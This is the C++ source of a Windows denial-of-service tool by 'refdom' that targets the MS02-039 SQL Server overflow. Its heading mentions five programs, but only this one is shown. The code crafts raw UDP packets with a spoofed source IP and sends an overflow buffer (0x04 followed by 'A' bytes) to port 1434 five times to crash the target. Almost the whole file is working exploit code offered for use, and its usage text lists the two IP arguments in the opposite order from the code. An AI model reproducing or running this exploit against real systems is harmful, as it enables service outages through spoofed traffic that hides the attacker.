sqloverflowdos代码.cpp

五个C++程序源代码

////////////////////////////////////////////////////////////
// 　　　　　　　 　　　　                                      
// SQL Overflow dos tool
//
// Reference: MS02-039
//
// Author: refdom
// Email: refdom@263.net
// Homepage: www.opengram.com
//
////////////////////////////////////////////////////////////

#include <string.h>
#include <stdio.h>
#include <process.h>
#include <winsock2.h>
#include <ws2tcpip.h>

#pragma comment(lib,"ws2_32.lib")

#define SOURCE_PORT 53
#define DEST_PORT 1434

typedef struct ip_hdr			//定义IP首部
{
	unsigned char h_verlen;			//4位首部长度,4位IP版本号
	unsigned char tos;				//8位服务类型TOS
	unsigned short total_len;		//16位总长度（字节）
	unsigned short ident;			//16位标识
	unsigned short frag_and_flags;	//3位标志位
	unsigned char ttl;				//8位生存时间 TTL
	unsigned char proto;			//8位协议 (TCP, UDP 或其他)
	unsigned short checksum;		//16位IP首部校验和
	unsigned int sourceIP;			//32位源IP地址
	unsigned int destIP;			//32位目的IP地址
}IP_HEADER;

struct //定义TCP伪首部
{
	unsigned long saddr; //源地址
	unsigned long daddr; //目的地址
	char mbz;
	char ptcl; //协议类型 
	unsigned short tcpl; //TCP长度
}psd_header;

typedef struct tcp_hdr //定义TCP首部
{
	USHORT th_sport; //16位源端口
	USHORT th_dport; //16位目的端口
	unsigned int th_seq; //32位序列号
	unsigned int th_ack; //32位确认号
	unsigned char th_lenres; //4位首部长度/6位保留字
	unsigned char th_flag; //6位标志位
	USHORT th_win; //16位窗口大小
	USHORT th_sum; //16位校验和
	USHORT th_urp; //16位紧急数据偏移量
}TCP_HEADER;

typedef struct udp_hdr			//UDP首部
{
    unsigned short sourceport;       
    unsigned short destport;       
    unsigned short udp_length;       
    unsigned short udp_checksum;     
} UDP_HEADER;

//CheckSum:计算校验和的子函数
USHORT checksum(USHORT *buffer, int size) 
{ 
	unsigned long cksum=0;
	while(size >1)
	{
		cksum+=*buffer++;
		size -=sizeof(USHORT);
	}
	if(size ) 
	{
		cksum += *(UCHAR*)buffer;
	}
	cksum = (cksum >> 16) + (cksum & 0xffff);
	cksum += (cksum >>16);
	return (USHORT)(~cksum);
} 

void Usage()
{
	printf("******************************************\n");
	printf("SQLOverFlowDOS(MS02-039)\n");
	printf("\t Written by Refdom\n");
	printf("\t Email: refdom@263.net\n");
	printf("\t Homepage: www.opengram.com\n");
	printf("Useage: SQLDOS.exe Fake_ip Target_ip \n");
	printf("*******************************************\n");
}

void Sendudp (unsigned long ulTargetIP, unsigned long ulFakeIP)
{

	SOCKET sock;
	SOCKADDR_IN addr_in;
	BOOL flag;
	char buf[80] = {0};
	IP_HEADER ipHeader;
	UDP_HEADER udpHeader;
	int iTotalSize, iUdpCheckSumSize, i, j;
	char sendbuf[256] = {0};
	char *ptr = NULL;

	memset(buf, 'A', sizeof(buf) - 2);
	buf[0] = 0x04;

	sock = WSASocket(AF_INET,SOCK_RAW,IPPROTO_UDP,NULL,0,0);
	if (sock == INVALID_SOCKET)
	{
		printf("socket Error!\n");
		return;
	}

	flag = true;
	if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag))==SOCKET_ERROR)
	{
		printf("setsockopt Error!\n");
		return;
	}

	iTotalSize=sizeof(ipHeader)+sizeof(udpHeader)+sizeof(buf);

	ipHeader.h_verlen = (4 << 4) | (sizeof(ipHeader) / sizeof(unsigned long));
	ipHeader.tos=0;
	ipHeader.total_len=htons(iTotalSize);
	ipHeader.ident=0;
	ipHeader.frag_and_flags=0;
	ipHeader.ttl=128;
	ipHeader.proto=IPPROTO_UDP;
	ipHeader.checksum=0;
	ipHeader.sourceIP = ulFakeIP;
	ipHeader.destIP = ulTargetIP;

	udpHeader.sourceport = htons(SOURCE_PORT);
	udpHeader.destport = htons(DEST_PORT);
	udpHeader.udp_length = htons(sizeof(udpHeader)+sizeof(buf));
	udpHeader.udp_checksum = 0;
	
		ptr = NULL;

		//计算UDP校验和
		ZeroMemory(sendbuf,sizeof(sendbuf));
		ptr=sendbuf;
		iUdpCheckSumSize=0;
		udpHeader.udp_checksum = 0;

		memcpy(ptr,&ipHeader.sourceIP,sizeof(ipHeader.sourceIP));
		ptr +=sizeof(ipHeader.sourceIP);
		iUdpCheckSumSize+=sizeof(ipHeader.sourceIP);

		memcpy(ptr,&ipHeader.destIP,sizeof(ipHeader.destIP));
		ptr +=sizeof(ipHeader.destIP);
		iUdpCheckSumSize +=sizeof(ipHeader.destIP);
		
		ptr++;
		iUdpCheckSumSize++;

		memcpy(ptr,&ipHeader.proto,sizeof(ipHeader.proto));
		ptr +=sizeof(ipHeader.proto);
		iUdpCheckSumSize +=sizeof(ipHeader.proto);

		memcpy(ptr,&udpHeader.udp_length,sizeof(udpHeader.udp_length));
		ptr +=sizeof(udpHeader.udp_length);
		iUdpCheckSumSize +=sizeof(udpHeader.udp_length);

		memcpy(ptr,&udpHeader,sizeof(udpHeader));
		ptr +=sizeof(udpHeader);
		iUdpCheckSumSize += sizeof(udpHeader);
		
		for(i = 0; i < sizeof(buf); i++,ptr++)
			*ptr = buf[i];
		iUdpCheckSumSize += sizeof(buf);

		udpHeader.udp_checksum = checksum((USHORT*)sendbuf,iUdpCheckSumSize);

		ZeroMemory(sendbuf,sizeof(sendbuf));
		memcpy(sendbuf,&ipHeader,sizeof(ipHeader));
		memcpy(sendbuf+sizeof(ipHeader),&udpHeader,sizeof(udpHeader));
		memcpy(sendbuf+sizeof(ipHeader)+sizeof(udpHeader),buf,sizeof(buf));

		addr_in.sin_family = AF_INET;
		addr_in.sin_port = htons(DEST_PORT);
		addr_in.sin_addr.S_un.S_addr = ulTargetIP ;

		printf("\n Starting send packet\n\t");

		for (j = 0; j < 5; j++)
		{
			Sleep(500);
			if (sendto(sock, sendbuf, iTotalSize, 0, (SOCKADDR *)&addr_in, sizeof(addr_in))==SOCKET_ERROR)
			{
				printf("Send Error!\n");
				return;
			}
			else
			{
				printf(".");
			}
		}

		printf("\n Send OK!\n");

	if (sock != INVALID_SOCKET)
		closesocket(sock);
}

int main(int argc, char* argv[])
{
	WSADATA		WSAData;
	unsigned long ulTargetIP, ulFakeIP;

	Usage();

	if (argc < 3)
	{
		return false;
	}
	
	ulTargetIP = inet_addr(argv[1]);
	ulFakeIP = inet_addr(argv[2]);
	
	if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
	{
		printf("WSAStartup error.Error:%d\n",WSAGetLastError());
		return false;
	}

	printf("DOS starting ...\n");

	Sendudp(ulTargetIP, ulFakeIP);

	printf("\nComplete!\n");


	WSACleanup();

	return 0;
}